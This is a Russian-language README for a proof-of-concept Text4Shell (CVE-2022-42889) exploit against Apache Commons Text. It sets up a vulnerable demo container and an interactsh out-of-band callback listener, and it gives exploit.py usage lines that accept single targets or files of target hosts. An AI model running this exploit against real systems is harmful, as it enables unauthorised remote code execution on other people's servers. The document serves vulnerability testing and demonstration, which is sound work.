
CVE-2022-42889 - эксплойт Text4Shell
Это Proof of Concept, эксплуатирующий уязвимость в Apache Commons Text [CVE-2022-42889]
Уязвимые версии: с 1.5.0 до (не включая) 1.10.0
Успешная эксплуатация этой уязвимости позволяет неавторизованному злоумышленнику выполнить произвольный код на уязвимом активе
Приложение, разработанное @securekomodo, прикреплено здесь.
Это приложение также можно загрузить из docker-реестра
docker run -p 8080:8080 gokul2/text4shell-poc:latest
Теперь приложение будет доступно по адресу localhost:8080.
Для проверки выполнения произвольных команд мы используем interactsh — инструмент для захвата OOB-взаимодействий от @projectdiscovery.
Настройте interactsh client перед выполнением самого эксплойта.
docker run projectdiscovery/interactsh-client:latest
Запишите домен, указанный после запуска приложения
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Проверьте логи в interactsh-client для подтверждения эксплойта.